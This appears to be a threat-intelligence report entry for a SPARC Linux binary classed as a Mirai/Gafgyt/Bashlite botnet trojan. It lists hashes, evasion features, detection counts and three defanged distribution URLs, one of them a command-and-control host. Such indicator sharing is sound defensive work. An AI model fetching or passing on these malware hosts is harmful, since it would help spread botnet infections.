c.spc

First submission: 2024-09-05 01:04:02
Last submission: 2024-09-05 01:18:02

File details

File type: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
Mime type: application/x-executable
File size: 173.77 KB (177944 bytes)
MD5: 471ca2e78136d6387eb2e8515cb88f2e
SHA1: 4ce0444381f7a7f2b1c5958b095690b6285ed8d3
SHA256: 5354dc283ac0fa5135d4a4967536f02048a8a8a1d3eb1c6eb37a869367f04f26

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 42/79
VT report date: 2024-09-05 00:48:21
Malware Type 1 trojan
Threat Type 3 mirai gafgyt bashlite

URLs, FQDN and IP indicators 3

URL    Host (FQDN/IP)    Date Added
hXXp://cnc.ghty.online/c.spc    cnc.ghty.online    2024-09-05 01:18:04
hXXp://ydl-v2.mhdy.site/c.spc    ydl-v2.mhdy.site    2024-09-05 01:17:05
hXXp://5.59.248.92/c.spc    5.59.248.92    2024-09-05 01:04:02

Strings analysis - Possible IPs found 3

5.59.248.92
127.0.0.1
192.168.0.100

Strings analysis - Possible URLs found 13
